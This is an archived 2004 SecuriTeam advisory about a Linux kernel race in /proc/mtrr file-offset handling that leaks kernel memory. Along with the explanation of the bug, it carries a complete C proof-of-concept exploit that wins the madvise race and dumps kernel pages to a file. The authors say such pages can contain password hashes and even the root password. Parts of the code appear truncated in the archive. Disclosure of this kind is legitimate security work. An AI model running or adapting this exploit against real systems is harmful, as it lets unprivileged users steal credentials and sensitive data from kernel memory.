[UNIX] Linux Kernel File Offset Pointer Handling

From: SecuriTeam (support_at_securiteam.com)
Date: 08/10/04

  • Next message: SecuriTeam: "[NT] Vulnerability in Exchange Server 5.5 Outlook Web Access Allows CSS and Spoofing Attacks (MS04-026)"
    To: list@securiteam.com
    Date: 10 Aug 2004 19:05:03 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.

    - - - - - - - - -

      Linux Kernel File Offset Pointer Handling


    The Linux kernel offers a file handling API to the userland applications.
    Basically a file can be identified by a file name and opened through the
    open(2) system call which in turn returns a file descriptor for the kernel
    file object. A critical security vulnerability has been found in the Linux
    kernel code handling 64bit file offset pointers.


    One of the properties of the file object is something called 'file offset'
    (f_pos member variable of the file object), which is advanced if one reads
    or writes to the file. It can also by changed through the lseek(2) system
    call and identifies the current writing/reading position inside the file
    image on the media.

    There are two different versions of the file handling API inside recent
    Linux kernels: the old 32 bit and the new (LFS) 64 bit API. We have
    identified numerous places, where invalid conversions from 64 bit sized
    file offsets to 32 bit ones as well as insecure access to the file offset
    member variable take place.

    We have found that most of the /proc entries (like /proc/version) leak
    about one page of un-initialized kernel memory and can be exploited to
    obtain sensitive data.

    We have found dozens of places with suspicious or bogus code. One of them
    resides in the MTRR handling code for the i386 architecture:

    static ssize_t mtrr_read(struct file *file, char *buf, size_t len,
                             loff_t *ppos)
    [1] if (*ppos >= ascii_buf_bytes) return 0;
    [2] if (*ppos + len > ascii_buf_bytes) len = ascii_buf_bytes - *ppos;
        if ( copy_to_user (buf, ascii_buffer + *ppos, len) ) return -EFAULT;
    [3] *ppos += len;
        return len;
    } /* End Function mtrr_read */

    It is quite easy to see that since copy_to_user can sleep, the second
    reference to *ppos may use another value. Or in other words, code
    operating on the file->f_pos variable through a pointer must be atomic in
    respect to the current thread. We expect even more troubles in the SMP
    case though.

    In the following we want to concentrate onto the mttr.c code, however we
    think that also other f_pos handling code in the kernel may be

    The idea is to use the blocking property of copy_to_user to advance the
    file->f_pos file offset to be negative allowing us to bypass the two
    checks marked with [1] and [2] in the above code.

    There are two situation where copy_to_user() will sleep if there is no
    page table entry for the corresponding location in the user buffer used to
    receive the data:

     - The underlying buffer maps a file which is not in the kernel page cache
    yet. The file content must be read from the disk first

     - The mmap_sem semaphore of the process's VM is in a closed state, that
    is another thread sharing the same VM caused a down_write on the

    We use the second method as follows. One of two threads sharing same VM
    issues a madvise(2) call on a VMA that maps some, sufficiently big file
    setting the madvise flag to WILLNEED. This will issue a down_write on the
    mmap semaphore and schedule a read-ahead request for the mmaped file.

    Second thread issues in the mean time a read on the /proc/mtrr file thus
    going for sleep until the first thread returns from the madvise system
    call. The two threads will be woken up in a FIFO manner thus the first
    thread will run as first and can advance the file pointer of the proc file
    to the maximum possible value of 0x7fffffffffffffff while the second
    thread is still waiting in the scheduler queue for CPU (itn the non-SMP

    After the place marked with [3] has been executed, the file position will
    have a negative value and the checks [1] and [2] can be passed for any
    buffer length supplied, thus leaking the kernel memory from the address of
    ascii_buffer on to the user space.

    We have attached a proof-of-concept exploit code to read portions of
    kernel memory. Another exploit code we have at our disposal can us other
    /proc entries (like /proc/version) to read one page of kernel memory.

    Since no special privileges are required to open the /proc/mtrr file for
    reading any process may exploit the bug to read huge parts of kernel

    The kernel memory dump may include very sensitive information like hashed
    passwords from /etc/shadow or even the root password.

    We have found in an experiment that after the root user logged in using
    ssh (in our case it was OpenSSH using PAM), the root password was kept in
    kernel memory. This is very surprising since sshd will quickly clean
    (overwrite with zeros) the memory portion used to store the password. But
    the password may have made its way through various kernel paths like pipes
    or sockets.

    Tested and known to be vulnerable kernel versions are all <= 2.4.26 and <=
    2.6.7. All users are encouraged to patch all vulnerable systems as soon as
    appropriate vendor patches are released. There is no HotFix for this

    Proof of Concept:
     * gcc -O3 proc_kmem_dump.c -o proc_kmem_dump
     * Copyright (c) 2004 iSEC Security Research. All Rights Reserved.

    #define _GNU_SOURCE

    #include <stdio.h>
    #include <stdlib.h>
    #include <signal.h>
    #include <string.h>
    #include <errno.h>
    #include <unistd.h>
    #include <fcntl.h>
    #include <time.h>
    #include <sched.h>

    #include <sys/socket.h>
    #include <sys/select.h>
    #include <sys/time.h>
    #include <sys/mman.h>

    #include <linux/unistd.h>

    #include <asm/page.h>

    // define machine mem size in MB
    #define MEMSIZE 64

    _syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res,
       uint, wh);

    void fatal(const char *msg)
     if(!errno) {
      fprintf(stderr, "FATAL ERROR: %s\n", msg);
     else {


    static int cpid, nc, fd, pfd, r=0, i=0, csize, fsize=1024*1024*MEMSIZE,
               size=PAGE_SIZE, us;
    static volatile int go[2];
    static loff_t off;
    static char *buf=NULL, *file, child_stack[PAGE_SIZE];
    static struct timeval tv1, tv2;
    static struct stat st;

    // child close sempahore & sleep
    int start_child(void *arg)
    // unlock parent & close semaphore
     madvise(file, csize, MADV_DONTNEED);
     madvise(file, csize, MADV_SEQUENTIAL);
     gettimeofday(&tv1, NULL);
     read(pfd, buf, 0);

     r = madvise(file, csize, MADV_WILLNEED);

    // parent blocked on mmap_sem? GOOD!
     if(go[1] == 1 || _llseek(pfd, 0, 0, &off, SEEK_CUR)<0 ) {
      r = _llseek(pfd, 0x7fffffff, 0xffffffff, &off, SEEK_SET);
       if( r == -1 )
      printf("\n[+] Race won!"); fflush(stdout);
     } else {
      printf("\n[-] Race lost %d, use another file!\n", go[1]);
      kill(getppid(), SIGTERM);

    return 0;

    void usage(char *name)
     printf("\nUSAGE: %s <file not in cache>", name);

    int main(int ac, char **av)

    // mmap big file not in cache
     r=stat(av[1], &st);
      fatal("stat file");
     csize = (st.st_size + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1);

     fd=open(av[1], O_RDONLY);
      fatal("open file");
     file=mmap(NULL, csize, PROT_READ, MAP_SHARED, fd, 0);
     printf("\n[+] mmaped uncached file at %p - %p", file, file+csize);

     pfd=open("/proc/mtrr", O_RDONLY);

     fd=open("kmem.dat", O_RDWR|O_CREAT|O_TRUNC, 0644);
      fatal("open data");

     r=ftruncate(fd, fsize);

     buf=mmap(NULL, fsize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
     printf("\n[+] mmaped kernel data file at %p", buf);

    // clone thread wait for child sleep
     nc = nice(0);
     cpid=clone(&start_child, child_stack + sizeof(child_stack)-4,
     while(go[0]==0) {

    // try to read & sleep & move fpos to be negative
     gettimeofday(&tv1, NULL);
     go[1] = 1;
     r = read(pfd, buf, size );
     go[1] = 2;
     gettimeofday(&tv2, NULL);
     while(go[0]!=2) {

     us = tv2.tv_sec - tv1.tv_sec;
     us *= 1000000;
     us += (tv2.tv_usec - tv1.tv_usec) ;

     printf("\n[+] READ %d bytes in %d usec", r, us); fflush(stdout);
     r = _llseek(pfd, 0, 0, &off, SEEK_CUR);
     if(r < 0 ) {
      printf("\n[+] SUCCESS, lseek fails, reading kernel mem...\n");
      for(;;) {
       r = read(pfd, buf, PAGE_SIZE );
       buf += PAGE_SIZE;
       printf("\r PAGE %6d", i); fflush(stdout);
      printf("\n[+] done, err=%s", strerror(errno) );

     kill(cpid, 9);

    return 0;


    The information has been provided by <mailto:ihaquer@isec.pl> Paul
    The original article can be found at:


    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] Vulnerability in Exchange Server 5.5 Outlook Web Access Allows CSS and Spoofing Attacks (MS04-026)"